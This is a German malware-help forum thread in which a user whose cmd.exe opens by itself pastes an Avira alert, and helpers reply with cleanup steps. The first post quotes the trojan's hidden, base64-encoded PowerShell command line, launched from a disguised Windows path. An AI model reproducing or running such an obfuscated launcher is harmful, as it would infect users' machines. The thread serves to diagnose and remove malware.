![]() |
|
Log-Analyse und Auswertung: Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selberWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
![]() |
|
![]() | #1 |
| ![]() Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber Obgleich ich hier offenbar auf Hilfsbereitschaft treffe, würde ich mich sehr freuen, wenn mein Anliegen nicht als "Dünnschiss" betitelt wird. Jetzt aber zu dem, was Avira mir ausspuckt(da es gerade wieder zu einer Meldung kam): Code:
ATTFilter Dateiname: powershell.exe Name der Bedrohung: TR/SensorBased Typ:Trojaner Pfad:C:\Windows \...\WindoesP Übergeordnet:C:\Windows\System32\cmd.exe Auslöser:cmdline=-windowstyle hidden -e "cgakaaoajab0aguaeab0aeeacwbjad0awwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoaqqbtaemasqbjadsacgakaaoajabqahaapqakag4adqbsagwaowakaaoazgb1ag4aywb0agkabwbuacaazwblahqadablahiargb1ag4aywaoafsacwb0ahiaaqbuagcaxqakagiadabzadiakqagahsacgajacqaygb0ahmapqbbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabiahqacwayackaowakaaoacqakahmadaa9acqadablahgadabbahmaywauaecazqb0aeiaeqb0aguacwaoaccarwblahqalqbjahqazqbtafaacgbvahaazqbyahqaeqbwageabab1aguajwapadsacgajacqazqbkad0ajabiahqacwbbadaalgauadqaxqa7aaoacgajacqaaqa9adaaowakaakajabsad0ajablagqalgbmaguabgbnahqaaaa7aaoacqakagsapqbaacgakqa7aaoacgajafsayqbyahiayqb5af0aoga6afiazqbzagkaegblacgawwbyaguazgbdacqaawasacqacwb0ac4abablag4azwb0aggakqa7aaoacqbmag8acgblageaywboacgajabiacaaaqbuacaajabzahqakqagahsajabrafsajabpacsakwbdad0ajabiacaalqbiahgabwbyacaajablagqawwakagkajqakagwaxqb9aaoacgajacqaygbzad0ajabiahqacwbbadualgauacqaygb0ahmalgbsaguabgbnahqaaabdadsacgakaakajabpad0amaa7aaoacqakagwapqakagsalgbmaguabgbnahqaaaa7aaoacqakagqadaa9aeaakaapadsacgakaakawwbhahiacgbhahkaxqa6adoaugblahmaaqb6aguakabbahiazqbmaf0ajabkahqalaakagiacwauagwazqbuagcadaboackaowakaakazgbvahiazqbhagmaaaaoacqaygagagkabgagacqaygbzackaiab7acqazab0afsajabpacsakwbdad0ajabiacaalqbiahgabwbyacaajabrafsajabpacuajabsaf0afqakaaoacqbyaguadab1ahiabgagacqadablahgadabbahmaywauaecazqb0afmadabyagkabgbnacgajabkahqakqagahwaiabdag8abgb2aguacgb0aeyacgbvag0alqbkahmabwbuadsacgb9aaoacgakacqadgagad0aiaaiadaaiga7aaoajabsahyaiaa9acaaiga4aciaowakacqazaagad0aiaaiagkacgbpag4azwb0agcayqbuagqabqbvahqaaqb2ac4aeab5ahoaiga7aaoajablahaaiaa9acaaigbxahkasqawae0arabzadiatqb6agmamgbnafqaawaxae4aagbfahoatqbeaeuanaboagoasqbpaewarabfadiatgbuae0aegbnahoasqa0ae4avabgagqaiga7aaoacgakagcacaboageabqblacaapqagaciasablaemavqa6afwauwbvagyadab3ageacgblafwaqgbpag4ayqbyahkargbvahiadabyaguacwbzafmabwbmahqadwbhahiazqbcaciaowakaaoadabyahkaiab7aaoacqakagoacaa9acqadablahgadabbahmaywauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqazqbwackakqagahwaiabdag8abgb2aguacgb0aeyacgbvag0alqbkahmabwbuadsacgb9acaaywbhahqaywboahsafqakaaoajabqagqaiaa9acaajabuahuababsadsacgakaaoajabhacaapqagacqadablahgadabbahmaywa7aaoacgakahiaawblahkatgagad0aiaaiaeqaaqbzahaababhahkaiabgahuacwbpag8abgaiadsacgakahuapqakagoacabbadaaxqa7aaoajabpahmapqakagoacabbadeaxqa7aaoacgb3aggaaqbsaguakaakahqacgb1aguakqagahsacgajahqacgb5acaaewakaakacqb0ahiaeqagahsacgajaakacqbpagyaiaaoaceakabuaguacwb0ac0auabhahqaaaagacqazwbwae4ayqbtaguakqapacaaewakaakacqajaakatgblahcalqbjahqazqbtacaalqbqageadaboacaajabnahaatgbhag0azqagahwaiabpahuadaatae4adqbsagwaowakaakacqajah0acgajaakafqbjageadabjaggaewb9aaoacgajaakajablahgaiaa9acaajabmageababzaguaowakaaoacqajagkazgagacgajabqagqaiaataguacqagacqabgb1agwabaapacaaewakaakacqajahqacgb5acaaewakaakacqajaakajabyacaapqagaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkavgbhagwadqblacaalqbqageadaboacaajabnahaatgbhag0azqagac0atgbhag0azqagacqacgbraguaeqboadsacgajaakacqajacqaagbkacaapqagagcazqb0ahqazqbyaeyadqbuagmakaakahiakqa7aaoacgajaakacqajacqadgagad0aiaakagoazabbadaaxqa7aaoacgajaakacqajacqazqb4acaapqagacqadabyahuazqa7aaoacqajaakafqbjageadabjaggaewb9aaoacqajah0aiablagwacwblacaaewakaakacqajacqadgagad0aiaakagoazabbadaaxqa7aaoacqajah0acgakaakacqb0ahiaeqagahsacgajaakacqakagqadaagad0aiab3agcazqb0acaaigboahqadabwahmaogavac8ajabkac8aeaa/ahuapqakahuajgbpahmapqakagkacwamagwadga9acqabab2acyacgb2ad0ajab2aciaiaatafuacwblaeiayqbzagkaywbqageacgbzagkabgbnadsacgakaakacqajacqaagbkadiaiaa9acaazwblahqadablahiargb1ag4aywaoacqazab0ackaowakaakacqajagkazgagacgajabqagqamgbbadaaxqagac0azwb0acaajab2ackaiab7aaoacqajaakacqakahyamgagad0aiaakagoazaayafsamabdadsacgakaakacqajaakatgblahcalqbjahqazqbtafaacgbvahaazqbyahqaeqagac0auabhahqaaaagacqazwbwae4ayqbtaguaiaatae4ayqbtaguaiaakahiaawblahkatgagac0avgbhagwadqblacaajabkahqaiaatafaacgbvahaazqbyahqaeqbuahkacablacaaigbtahqacgbpag4azwaiacaalqbgag8acgbjaguaiab8acaatwb1ahqalqboahuababsadsacgajaakacqajacqaagbkacaapqagacqaagbkadiaowakaakacqajaakajablahgaiaa9acaajab0ahiadqbladsacgajaakacqb9aaoacqajah0aywbhahqaywboahsafqakaaoacqajagkazgagacgajablahgaiaataguacqagacqadabyahuazqapacaaewakaakacqajahqacgb5ahsacgajaakacqajahmadabvahaaowakaakacqajah0aywbhahqaywboahsafqakaaoacqajaakadabyahkaiab7aaoacqajaakacqbpaguaeaagacqaagbkafsamqbdadsacgajaakacqb9agmayqb0agmaaab7ah0acgajaakafqakaakafqagagmayqb0agmaaab7ah0acgakaakadabyahkaiab7aaoacqajacqacwbsahmaiaa9acaakaaoagcazqb0ac0acgbhag4azabvag0aiaa3adaaiaatag0aaqbuagkabqb1ag0aiaa1adaakqaqadyamaapadsacgajaakajab0ahmaiaa9acaawwbpag4adabdacgarwblahqalqbeageadablacaalqbvaeyabwbyag0ayqb0acaajqbzackaowakaaoacqajadoacwbsacaadwboagkabablacgajab0ahiadqblackaiab7aaoacqajaakadabyahkaewakaakacqajaakacgb1ag4akaakagqalaakahualaakagkacwapadsacgajaakacqb9agmayqb0agmaaab7ah0acgakaakacqajafmadabhahiadaatafmabablaguacaagacgazwblahqalqbyageabgbkag8abqagadyanqagac0abqbpag4aaqbtahuabqagadianqapadsacgajaakacqakahqacwayacaapqagafsaaqbuahqaxqaoaecazqb0ac0arabhahqazqagac0avqbgag8acgbtageadaagacuacwapadsacgakaakacqajagkazgagacgakaakahqacwayac0ajab0ahmakqagac0azwb0acaajabzagwacwapacaaewakaakacqajaakaygbyaguayqbracaacwbsadsacgajaakacqb9aaoacqajah0acgajah0aiabjageadabjaggaewb9aaoafqa=",filename=powershell.exe,silent=1 Ich habe auch versucht die Logdateien von einem Avira-Scan zu bekommen, aber ich finde leider keinen weg zu diesen Geändert von cosinus (20.07.2022 um 20:06 Uhr) Grund: code tags |
![]() | #2 |
/// TB-Ausbilder ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() | ![]() Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber Danke für die Infos.
__________________![]() Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
|
![]() | #3 | |
/// Winkelfunktion /// TB-Süch-Tiger™ ![]() ![]() ![]() ![]() ![]() ![]() | ![]() Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selberZitat:
![]() adwCleaner Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei in CODE-Tags. adwcleaner bitte wiederholen falls es Funde gab. ![]() Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit. Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
__________________ |
![]() |
Themen zu Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber |
avira, cmd öffnet automatisch, education, excel, fehler, google, home, internet, internet explorer, microsoft defender, nvcontainer, nvcontainer.exe, powershell, problem, programm, proxy, prozesse, realtek, registry, rundll, scan, security, services.exe, software, stick, svchost.exe, system, troja, trojaner, udp, usb, windows |